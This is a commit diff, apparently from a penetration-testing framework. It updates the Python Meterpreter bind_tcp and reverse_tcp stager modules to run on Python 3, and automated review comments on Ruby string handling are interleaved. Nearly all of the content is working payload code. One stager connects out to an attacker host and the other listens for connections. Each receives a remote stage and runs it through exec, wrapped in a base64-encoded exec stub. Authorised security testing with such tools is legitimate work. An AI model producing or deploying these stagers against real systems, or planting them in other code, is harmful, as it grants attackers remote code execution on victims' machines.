
Commit aeca455

committed
Pymeterpreter update pystagers for version 3.1/3.2
1 parent b842979 commit aeca455


2 files changed

+28
-24
lines changed


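--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -29,22 +29,24 @@ def initialize(info = {})
 # Constructs the payload
 #
 def generate
-cmd = ''
 # Set up the socket
-cmd += "import socket,struct\n"
-cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-cmd += "s.listen(1)\n"
-cmd += "c,a=s.accept()\n"
-cmd += "l=struct.unpack('>I',c.recv(4))[0]\n"
-cmd += "d=c.recv(4096)\n"
-cmd += "while len(d)!=l:\n"
-cmd += "\td+=c.recv(4096)\n"
-cmd += "exec(d,{'s':c})\n"
+cmd = "import socket,struct\n"
+cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+cmd << "s.listen(1)\n"
+cmd << "c,a=s.accept()\n"
+cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
+cmd << "d=c.recv(4096)\n"
+cmd << "while len(d)!=l:\n"
+cmd << "\td+=c.recv(4096)\n"
+cmd << "exec(d,{'s':c})\n"
 
 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
-return cmd
+b64_stub = "import base64,sys; exec(base64.b64decode("
+b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
+b64_stub << Rex::Text.encode_base64(cmd)
+b64_stub << "')))"
+return b64_stub
 end
 
 def handle_intermediate_stage(conn, payload)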
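Review bot: The comment above the base64 line (new line 44) is now incomplete: it still explains only why the stage is base64-encoded, while the stub assembled on new lines 45-48 also wraps the literal in `(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))`, whose purpose is left undocumented. I would extend it to `# Base64 encoding is required in order to handle Python's formatting requirements in the while loop; the str/bytes shim hands b64decode a bytes object on Python 3, which the 3.1/3.2 interpreters named in the commit title presumably require`. The same five stub lines are built verbatim in reverse_tcp.rb (new lines 43-47); a shared helper would keep the two copies from drifting, though where it belongs is outside this diff. `generate` is shown in full, but the enclosing module starts and ends outside the hunk.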

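--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -29,20 +29,22 @@ def initialize(info = {})
 # Constructs the payload
 #
 def generate
-cmd = ''
 # Set up the socket
-cmd += "import socket,struct\n"
-cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
-cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
-cmd += "d=s.recv(4096)\n"
-cmd += "while len(d)!=l:\n"
-cmd += "\td+=s.recv(4096)\n"
-cmd += "exec(d,{'s':s})\n"
+cmd = "import socket,struct\n"
+cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
+cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
+cmd << "d=s.recv(4096)\n"
+cmd << "while len(d)!=l:\n"
+cmd << "\td+=s.recv(4096)\n"
+cmd << "exec(d,{'s':s})\n"
 
 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
-return cmd
+b64_stub = "import base64,sys; exec(base64.b64decode("
+b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
+b64_stub << Rex::Text.encode_base64(cmd)
+b64_stub << "')))"
+return b64_stub
 end
 
 def handle_intermediate_stage(conn, payload)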
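Review bot: `cmd = "import socket,struct\n"` on new line 33 followed by `cmd << ...` mutates a string literal in place; that works without a frozen-string pragma, but if the file header (not shown here) has or later gains `# frozen_string_literal: true`, the first `<<` raises a FrozenError. `cmd = String.new("import socket,struct\n")` (and likewise `b64_stub = String.new("import base64,sys; exec(base64.b64decode(")` on new line 43) makes the mutable build-up explicit; bind_tcp.rb new lines 33 and 45 have the same shape. The explicit `return b64_stub` on new line 47 can also be dropped, since the last expression of `generate` is already its value.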
